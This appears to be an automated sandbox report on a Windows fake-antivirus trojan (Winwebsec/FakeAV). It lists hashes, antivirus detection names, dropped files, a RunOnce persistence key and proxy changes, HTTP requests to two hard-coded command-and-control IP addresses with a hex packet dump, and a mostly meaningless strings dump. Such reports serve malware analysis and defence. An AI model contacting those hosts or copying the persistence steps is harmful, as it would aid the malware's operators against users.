Analysis Date: 2015-09-08 12:34:03
MD5: d10ada7598340f43cc105abd1aa82ecd
SHA1: 6a95099b4309a5f10615128e78705847cf65a911

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: e6c85f3a08096c6df33ee0db5895b4fb sha1: 44a187aab250e3252159e826ab118c79c6a1899f size: 188416
Section .rdata md5: 8b0fca2cc6d5939037f317828ba7f274 sha1: 888207b3e33c3292c847ee95e9620e3667a2385c size: 2048
Section .data md5: 9ae85e31ac234e41050b54e1bb9bd3b2 sha1: 8b0e2fdb214397694b48ff08f641f1eb5b5d0c94 size: 123392
Section .rsrc md5: 701268b5a62792ae9076c7ee8cb2df47 sha1: af5d582da7cdbd93102ed8e58bd815967880ba7f size: 5120
Timestamp: 1970-02-17 15:15:50 (PE header compile time; a 1970 value is not credible and should not be relied on for dating the sample)
PEhash: f712f2590eed4665a9e835c30fd0178ba41be592
IMPhash: b3fb08000bf2c73a4d021514861a66a8
AV Rising: Trojan.FakeAV!49B1
AV Mcafee: Generic FakeAlert.amb
AV Avira (antivir): TR/FakeAV.btxt.7
AV Twister: Trojan.680872042DDE022A
AV Ad-Aware: Gen:Heur.Cridex.2
AV Alwil (avast): MalOb-FY [Cryp]
AV Eset (nod32): Win32/Kryptik.MBU
AV Grisoft (avg): FakeAlert.AAS
AV Symantec: Trojan.FakeAV!gen39
AV Fortinet: W32/FakeAlert.AMB!tr
AV BitDefender: Gen:Heur.Cridex.2
AV K7: Trojan ( 001e60c61 )
AV Microsoft Security Essentials: Rogue:Win32/Winwebsec
AV MicroWorld (escan): Gen:Heur.Cridex.2
AV MalwareBytes: Trojan.Agent
AV Authentium: W32/FakeAlert.LY.gen!Eldorado
AV Frisk (f-prot): W32/FakeAlert.LY.gen!Eldorado
AV Ikarus: Trojan.Win32.Pakes
AV Emsisoft: Gen:Heur.Cridex.2
AV Zillya!: Trojan.FakeAV.Win32.64024
AV Kaspersky: Trojan.Win32.FakeAV.cano
AV Trend Micro: TROJ_FAKEAV.SMID
AV CAT (quickheal): FraudTool.Security
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997
AV Padvish: Malware.Trojan.FakeAV-7886
AV BullGuard: Gen:Heur.Cridex.2
AV Arcabit (arcavir): Gen:Heur.Cridex.2
AV ClamAV: Trojan.FakeAV-7886
AV Dr. Web: Trojan.Fakealert.20556
AV F-Secure: Gen:Heur.Cridex.2
AV CA (E-Trust Ino): Win32/Diple.A!generic

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\6a95099b4309a5f10615128e78705847cf65a911
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a246B.tmp
Creates File: C:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000.exe
Deletes File: C:\6a95099b4309a5f10615128e78705847cf65a911
Creates Process: "C:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000.exe" "C:\malware.exe"
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\aDBD4.tmp"
Creates Mutex: Don't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000.exe" "C:\malware.exe"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\eLdAbKmMmNe09000 ➝ C:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000.exe\\x00 (RunOnce entry pointing at the dropped copy: persistence indicator)
Creates File: C:\Documents and Settings\All Users\Application Data\eLdAbKmMmNe09000\eLdAbKmMmNe09000
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: Don't stop me! I give work and money for you!
Winsock DNS: 69.50.195.77

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aDBD4.tmp"

Network Details:

HTTP GET: http://194.28.113.214/lurl.php?affid=09000
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POST: http://69.50.195.77/i.php?affid=09000&v=2
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1032 ➝ 69.50.195.77:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30393030 30204854 54502f31   fid=09000 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f692e 7068703f 61666669   POST /i.php?affi
0x00000010 (00016)   643d3039 30303026 763d3220 48545450   d=09000&v=2 HTTP
0x00000020 (00032)   2f312e31 0d0a5265 66657265 723a2068   /1.1..Referer: h
0x00000030 (00048)   7474703a 2f2f3639 2e35302e 3139352e   ttp://69.50.195.
0x00000040 (00064)   37370d0a 41636365 70743a20 2a2f2f2a   77..Accept: *//*
0x00000050 (00080)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000060 (00096)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x00000070 (00112)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x00000080 (00128)   640d0a55 7365722d 4167656e 743a204d   d..User-Agent: M
0x00000090 (00144)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x000000a0 (00160)   61746962 6c653b20 4d534945 20372e30   atible; MSIE 7.0
0x000000b0 (00176)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000c0 (00192)   3b204754 42302e30 3b202e4e 45542043   ; GTB0.0; .NET C
0x000000d0 (00208)   4c522031 2e312e34 33323229 0d0a486f   LR 1.1.4322)..Ho
0x000000e0 (00224)   73743a20 36392e35 302e3139 352e3737   st: 69.50.195.77
0x000000f0 (00240)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000100 (00256)   3a203738 0d0a436f 6e6e6563 74696f6e   : 78..Connection
0x00000110 (00272)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x00000120 (00288)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000130 (00304)   63616368 650d0a0d 0a646174 613d3331   cache....data=31
0x00000140 (00320)   41454138 34334232 44323039 45463245   AEA843B2D209EF2E
0x00000150 (00336)   32354536 36394441 42303638 33373444   25E669DAB068374D
0x00000160 (00352)   38343538 45304146 44354439 46383034   8458E0AFD5D9F804
0x00000170 (00368)   37314538 33373745 33423746 36383031   71E8377E3B7F6801
0x00000180 (00384)   30343126 763d32                       041&v=2


Strings
dd
a
.
.t
I
-
..
.
....
.
.
iF
.
{
.
.
`
1001
File
Main
MS Sans Serif
< >=/`
)\@ +_
]00uLCL
^~-03B
`040Ov
0~7l`J
0*p=Tu
@0U]:1L
0.yXoN
12et~j
16s.f'
~1FO<H
~1R01;+WH
1Z;ML S
2egbnzNL
2kW5MR
2LLES)n
*	2O\l
2q0N6in
3\=:%{
3]aMH*ah
3[-FHtL
3PIZd6
3PtLQM
3pV4AN
3t=/d*i
]3]vI~
3=WGUX
!$3"y}
3ypv|"
4	6Q>D
4n(7C&
4X-5rm?
56c_fl.
5GAPzA
5% g:u
5Hh>}}
5h/ rp
5LUum=t
5rmMrj
5XYO=!
5YTlc{!
.]~6=)
6A3Js5F
6Bq\]'
6e<Pa0
6{exj5
6j0enoeds
:6z^ !
7B#P8UB
7%e67`e
]?7hjo
)`7x7gokY
8Ag^)/
)8ayCo
8,bk"4
8*cjR5
8H4"$b
8i:`ma
8.}j<O]S
!8[ w/
<;94P7
96,\Z/
9AP 7s
*9FzC5I^
\(9\JGh"
)"9MF{
9|N>^p#C
9Uj<]HV
9XnFWyQOQ0%hB
9YH)<&
A2!BTiB
a2@<V=
a_)5n`
$Ab*w A
a{dguookeh
AdIh^a.
aD*SP;
aEf8#L
af.sqq$1
aic0=y
AjtyF.D
]#AMam
A]NLPu7
ao8H(:
aSL+ge
</assembly>
<assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
/`au	A
A([	[^(Z9
;{B2Tu
/b3g`I
(b5pT@q
BbJ0wN
.>bC1r
bdCK[nL_
BE BZw
bgH	.z
BhJ}dg
BitBlt
Bn}4(XoDx
~Brh6T|
BRi8[kY
BTjx-uY
bupT3&
_BVME5Q6
B`xd~yce
bxfzO9'"x
*b}~Z=>oG
C1v3NH
=.C5pfo
^ca:#I*<t
C<@Bws
:]cF5A
cG8tMM
+^cGux_
c{)h}\
CharLowerA
CloseHandle
.)Cq. 
 c)?QgW
CreateThread
&CViZ<a
c<%wn<
Cyoam\
CYP<ui
C<,z3	
C	ZJZt
d7^N_F
d7NN5^x*
~\=dAq
@.data
?D;cK7
de=iGK
DeleteCriticalSection
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
d^"Fls2
dhk9dL
DJ(VFkj
dM{jP	4
d?N@/EzJI(
d~)NgP>
d|[NIt
d<:s1|
{D)vdg
DvR=/oa
D/WrE.
DXcr[<m,EI
d@x}OG
DXP2f(
dZ'Ai~
dzkLl}x
e(;3r	q
E[.AmQR
>	Ec]~
E,CfG`n
ef64e}w
eGJ93I
?EjZr;
ek/Cqy
ElX{H^5
&e*N1z
EnumSystemLocalesA
e\odPP
E@/(TBcZ
etUmn]
ExitProcess
ExitThread
f2Iez70n38
F(|5^+
ffJph3
f~`{g :
fg4dzH
FIJ/w>a
F[lg>?
FlushFileBuffers
FlushInstructionCache
FqXQ3S-b5
F:QyL@c
FreeEnvironmentStringsA
FR:|N)
@FRO_slZ
'FtvQh
FvQ^p*
fxVLP#
%F%yAR$
 ^ {G{
)^g?^4].%
g48_	>
GBi/~D
G:b<?Y
gc816w?
GDI32.dll
GetBkColor
GetBkMode
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetFileType
GetFontData
GetKeyState
GetLastError
GetOEMCP
GetPixel
GetProcessHeap
GetProcessShutdownParameters
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetTimeZoneInformation
-Gh,,&
gN\BsH
gN	`iQ
gNJ"f*S
G$r!<<V
gWu%_u
;	=gzY
>h2>Ho:
H6<LKP
HeapAlloc
HeapCreate
HeapFree
|hFg0d
_:hiE^{$Au
hj!X/+
=!]_#Hn
H|[@U^$
h<uV\	
[hUyHq+
h Z@!-
HZ+s0W\
/	I1lv
i2mm|S
i6P41Q
ICmAly"
idgWi;
}]IEHu
IFcoh+u
!ig^l\
+i><]m
InterlockedDecrement
InterlockedExchange
{I`^Pk
IsValidLocale
j<(0_A
,J~1]"
j7->b6
JAo\!.T
Jd_dN+
>JH/5b2
J-:j^2w*
j(js.N\s
:~:jK@
j>.kS}
jMowfqg
JoNoUu7
Js7$w	
_j	>	[Y
jzifC(/v
';){k{
k1|UP&
k3('@8
}k3nK!Q)
k.5aMx$
K!a7J\
KE2<}iv
KERNEL32.dll
K^g [T
KHOpXAP
}.[.Kj
KKD7>C
KMBCm&
kML!ms
k{nidG
koZPlY
Kp2[x/Xd 
	;kv+Sy2
l1ee4N-
]l"2 m
@L7*:'
L+8u"dN
language="*"
LCMapStringA
LeaveCriticalSection
lm"VR'G
LocalAlloc
loFwpt
LuYw3[
/lWSMa
/Lx6IxL
lYGp0D
.(m4qlg
(m9vqt
M<ALkY
+mAw}0
Mf*lW}
Mh3MzAl<
MN>xH8|
Mo)Juo
mRwyzC
MSIMG32.dll
M	WHI	
MY|}InN
mz=?e~
m@[	Zx
n0D#%T
+=n1_a
]%N)<2*
N5899|
name="Microsoft.Windows.Common-Controls"
nb|9R%
NdvCuj-J
nf7i6H
n |?I^
NK.GrA3
N.L~G,
n  qBy
n%rj^Q
nsfef2Je
>nSgTO]yC ?
Nuxe*[
+{oaIc
oBOa9lB.!
^?OFr7:*,
O~h~B= 
ols,Yb
OpHFEy
oq6	aJkG^
oqkj?l
$ovH#e
ow|K1?
oxn,|n<
OZ1W-p
p	3z%I
:PClVa
+;pG)I_#
Pg^WDj->
{P>+,HN
PHTW(v5
P,hxz*
P*P5	a
processorArchitecture="*"/>
Ps`2HR
pSfzPCx)
[pSW>x
publicKeyToken="6595b64144ccf1df"
PV'b7d
_py	c8`
pyyo4j
qAU|X]
qj^ZZj
|q}m=|r
Qn!)jeV
QpqV=w
QpX*~1
&;.Qqa2B?
~qs5Ck
|Q^v/I
(qVj`G]Q
#QW"B8
Qy=b#1
qYFt1%e
r7D$Za
rB?H@c
`.rdata
Re>Z#f
RF>Y6[
_Rg$pk
RgrFq1
Rich$-
>rN4eQ
Rq9DFh
RtlUnwind
(R\=tN
R~xAfM
s1<xBIX
S5LA)e]/>k
][\{sA=
s*BhKu?
se^^+.F
SelectObject
SendMessageA
SetEndOfFile
SetEnvironmentVariableA
SetHandleCount
SetLastError
SetProcessShutdownParameters
SetStdHandle
SetTextCharacterExtra
[SK>/'
@s^WBy
s"x	mua
s<),yK
szV84W
t>1V7}
T7CS'vb
T<7P='
TC.?<I
}t\}dC#
tfwCFE
!This program cannot be run in DOS mode.
t::-J,
	`TMaSppRC
>T+`;N
Tpj{>-
Tqf`C1
TransparentBlt
t~TfvlR
Tu_e4}
type="win32"
U4x6Rs
UA,DQx
uaQgM>
`Uf.OKfXw
!uHm"F
UI$[9>
u,/ktr
U}PG}s
USER32.dll
Uv$[/)
vB(?WRA
version="6.0.0.0"
VGVGl5
VH3ZiA
VirtualAlloc
VirtualFree
VirtualQueryEx
vJM7hjwH=
V)l^g#u6hg?
vn_?h&
]vR\~}
VuMMt"
VY5?ztG
`vY9gQl
'v~Zkw
/w2o-6
?[W}6_w
	WaI	W
WaV=J"
wCI< ?
	WDw;p
w#frIZdX/
;w]GX!
	W;+h^
	W)l,l
Wl>;~s
wP`)AN
WriteConsoleA
,WR:LP
`+wR@tU
wVwJ`s*
#WWc^y
wZqT"$q
x0^NUW
xgIh(f
XH<{+82
xKjOoJ
xLA{:1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
X]oP?{
-xryZ*
<&xW*[
xwCuY'
)y+~):
y6k*D="
y7i0+C
y>F*CKR
*yFpFv
YgG@}x
Y=I~g2
y`I@=T~2
Y_x_HBr
Y/yU>i
Y$;Z13
z.4Zl]G
/ZByF6F
z(cjNh^
zClB5'
":ZfaE
zN[|8V
(ZnL H
zS.cYn
Zt^b"P
{zYV+$